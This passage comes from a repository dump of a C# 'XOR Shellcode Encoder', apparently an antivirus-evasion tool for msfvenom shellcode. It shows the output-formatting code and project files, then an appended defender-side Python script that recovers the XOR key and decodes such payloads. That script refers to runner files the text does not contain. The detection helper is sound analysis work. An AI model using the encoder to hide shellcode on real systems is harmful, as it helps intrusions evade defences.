| else 69 | { 70 | hex.AppendFormat("0x{0:x2}, ", b); 71 | } 72 | 73 | if ((count + 1) % 15 == 0) 74 | { 75 | hex.Append("\n"); 76 | } 77 | } 78 | 79 | Console.WriteLine($"XOR payload (key: 0xfa):"); 80 | Console.WriteLine($"byte[] buf = new byte[{buf.Length}] {{\n{hex}\n}};"); 81 | 82 | //// Decode the XOR payload 83 | //for (int i = 0; i < buf.Length; i++) 84 | //{ 85 | // buf[i] = (byte)((uint)buf[i] ^ 0xfa); 86 | //} 87 | 88 | } 89 | } 90 | } -------------------------------------------------------------------------------- /XOR Shellcode Encoder/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("XOR Shellcode Encoder")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("XOR Shellcode Encoder")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 
20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("ee64b207-d973-489b-84a8-b718b93e039b")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /XOR Shellcode Encoder/XOR Shellcode Encoder.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {EE64B207-D973-489B-84A8-B718B93E039B} 8 | Exe 9 | XOR_Shellcode_Encoder 10 | XOR Shellcode Encoder 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | -------------------------------------------------------------------------------- /XOR Shellcode Encoder/XOR Shellcode Encoder.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30804.86 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "XOR Shellcode Encoder", "XOR Shellcode Encoder.csproj", "{EE64B207-D973-489B-84A8-B718B93E039B}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | 
Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {EE64B207-D973-489B-84A8-B718B93E039B}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {EE64B207-D973-489B-84A8-B718B93E039B}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {EE64B207-D973-489B-84A8-B718B93E039B}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {EE64B207-D973-489B-84A8-B718B93E039B}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {AB26D59A-5BB7-41F5-969C-46504DCF0D8F} 24 | EndGlobalSection 25 | EndGlobal 26 | --------------------------------------------------------------------------------
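A defender-side helper, added here and not part of this repository, that undoes the fixed-key XOR the XOR Shellcode Encoder above applies without knowing the key: it recovers the key either from the known x64 stager prologue (the first five bytes of the msfvenom payload listed in the encoder's Program.cs) or from byte frequency, and parses the C#/PowerShell-style hex listings the runners embed. All function names are my own, and SAMPLE_PLAINTEXT is a constructed, non-functional byte string that only mimics the byte statistics of such a payload.

```python
import re
from collections import Counter
from typing import Optional, Tuple

# First bytes of the x64 msfvenom stager this repo encodes: cld ; and rsp, -0x10
X64_STAGER_PROLOGUE = bytes.fromhex("fc4883e4f0")

# Listing tokens such as 0x06 (C#) or 0xf (the single-digit form emitted by -f powershell).
# Word boundaries keep longer constants like 0x3000 from being split into two bytes.
_HEX_TOKEN = re.compile(r"\b0x([0-9a-fA-F]{1,2})\b")


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with one fixed key: the exact operation the repo's encoder and runners perform."""
    return bytes(b ^ key for b in data)


def parse_hex_listing(text: str) -> bytes:
    """Turn a pasted `byte[] buf = new byte[N] { 0x06, 0xb2, ... }` or `[Byte[]] $buf = 0x6,...`
    listing into raw bytes. Decimal VBA `Array(6, 178, ...)` listings are not handled here."""
    return bytes(int(tok, 16) for tok in _HEX_TOKEN.findall(text))


def key_from_prologue(blob: bytes, prologue: bytes = X64_STAGER_PROLOGUE) -> Optional[Tuple[int, int]]:
    """Try all 256 keys; return (key, offset) for the first key under which the encoded form of
    `prologue` occurs in the blob. Encoding the 5-byte prologue once per key is much cheaper than
    decoding the whole blob 256 times and finds exactly the same keys."""
    for key in range(256):
        offset = blob.find(xor_bytes(prologue, key))
        if offset != -1:
            return key, offset
    return None


def key_from_frequency(blob: bytes) -> int:
    """Heuristic: a single-byte XOR maps every plaintext 0x00 to the key, and position-independent
    shellcode is full of zero bytes (immediates, padding), so the most common byte is usually the key."""
    return Counter(blob).most_common(1)[0][0]


def recover_and_decode(blob: bytes) -> Tuple[int, bytes, str]:
    """Return (key, decoded_bytes, evidence). The prologue match is authoritative; the frequency
    guess is used only when the blob was truncated or patched so that no prologue is present."""
    hit = key_from_prologue(blob)
    if hit is not None:
        return hit[0], xor_bytes(blob, hit[0]), "prologue"
    key = key_from_frequency(blob)
    return key, xor_bytes(blob, key), "frequency"


# Constructed sample: the real prologue followed by harmless filler (a run of zero bytes and an
# ascending byte ramp). It is NOT a working payload; it only reproduces the byte statistics.
SAMPLE_PLAINTEXT = X64_STAGER_PROLOGUE + b"\x00" * 24 + bytes(range(1, 40))
SAMPLE_ENCODED = xor_bytes(SAMPLE_PLAINTEXT, 0xFA)  # what the repo's encoder would emit for it

if __name__ == "__main__":
    key, decoded, evidence = recover_and_decode(SAMPLE_ENCODED)
    print(f"key=0x{key:02x} via {evidence}, round trip ok: {decoded == SAMPLE_PLAINTEXT}")
    # The encoded array in Simple Shellcode Runner/Program.cs above begins with these tokens:
    listing = "byte[] buf = new byte[511] { 0x06, 0xb2, 0x79, 0x1e, 0x0a,"
    print(key_from_prologue(parse_hex_listing(listing)))  # (250, 0)
```

The same prologue check is what a YARA rule with the `xor` modifier performs for you; this version additionally reports the key and offset so the blob can be decoded for further analysis.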